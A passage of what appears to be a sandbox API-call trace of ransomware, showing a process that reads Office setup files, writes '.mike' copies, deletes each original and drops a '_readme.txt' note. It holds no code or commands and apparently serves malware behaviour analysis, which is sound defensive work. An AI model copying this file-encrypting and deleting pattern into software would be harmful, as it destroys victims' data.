lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.580] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21dc908 | out: lpFileInformation=0x21dc908*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d)) returned 1 [0052.580] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.580] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21dccac | out: lpFileInformation=0x21dccac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d)) returned 1 [0052.580] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.580] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike", lpFilePart=0x0) returned 0x6d [0052.581] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.581] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.581] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.581] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.581] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike", lpFilePart=0x0) returned 0x6d [0052.581] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.581] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike", lpFilePart=0x0) returned 0x6d [0052.581] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.581] GetFileType (hFile=0x288) returned 0x1 [0052.581] GetFileType (hFile=0x288) returned 0x1 [0052.582] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0052.582] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x21dd904 | out: lpFileInformation=0x21dd904*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d)) returned 1 [0052.582] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.583] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.583] GetFileType (hFile=0x288) returned 0x1 [0052.583] GetFileType (hFile=0x288) returned 0x1 [0052.583] ReadFile (in: hFile=0x288, lpBuffer=0x21df038, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21df038*, lpNumberOfBytesRead=0x2af038*=0x61d, lpOverlapped=0x0) returned 1 [0052.584] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike", lpFilePart=0x0) returned 0x6d [0052.584] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.584] GetFileType (hFile=0x288) returned 0x1 [0052.584] GetFileType (hFile=0x288) returned 0x1 [0052.584] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0052.585] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike", lpFilePart=0x0) returned 0x6d [0052.585] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.585] GetFileType (hFile=0x288) returned 0x1 [0052.585] GetFileType (hFile=0x288) returned 0x1 [0052.586] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.586] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike", lpFilePart=0x0) returned 0x6d [0052.586] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a23300, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8a23300, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a23300, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x840)) returned 1 [0052.586] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.586] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike", lpFilePart=0x0) returned 0x6d [0052.586] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21e8fe4 | out: lpFileInformation=0x21e8fe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a23300, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe8a23300, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe8a23300, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x840)) returned 1 [0052.586] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.586] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", dwFileAttributes=0x80) returned 1 [0052.587] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.587] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml")) returned 1 [0052.588] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.588] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.588] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML", lpFilePart=0x0) returned 0x68 [0052.588] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeae4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\_readme.txt", lpFilePart=0x0) returned 0x67 [0052.588] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\_readme.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x288 [0052.588] GetFileType (hFile=0x288) returned 0x1 [0052.588] GetFileType (hFile=0x288) returned 0x1 [0052.589] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.589] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.589] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.589] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.590] GetFileType (hFile=0x288) returned 0x1 [0052.590] GetFileType (hFile=0x288) returned 0x1 [0052.590] CloseHandle (hObject=0x288) returned 1 [0052.590] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.590] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.590] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0052.590] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0052.591] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21ecfa8 | out: lpFileInformation=0x21ecfa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8)) returned 1 [0052.591] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.591] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21ed334 | out: lpFileInformation=0x21ed334*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa671530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8)) returned 1 [0052.591] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.591] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike", lpFilePart=0x0) returned 0x6a [0052.591] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.591] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.591] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.591] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML", lpFilePart=0x0) returned 0x65 [0052.591] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike", lpFilePart=0x0) returned 0x6a [0052.591] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.592] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike", lpFilePart=0x0) returned 0x6a [0052.592] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.594] GetFileType (hFile=0x288) returned 0x1 [0052.594] GetFileType (hFile=0x288) returned 0x1 [0052.594] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0052.595] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21edf2c | out: lpFileInformation=0x21edf2c*(dwFileAttributes=0x20, 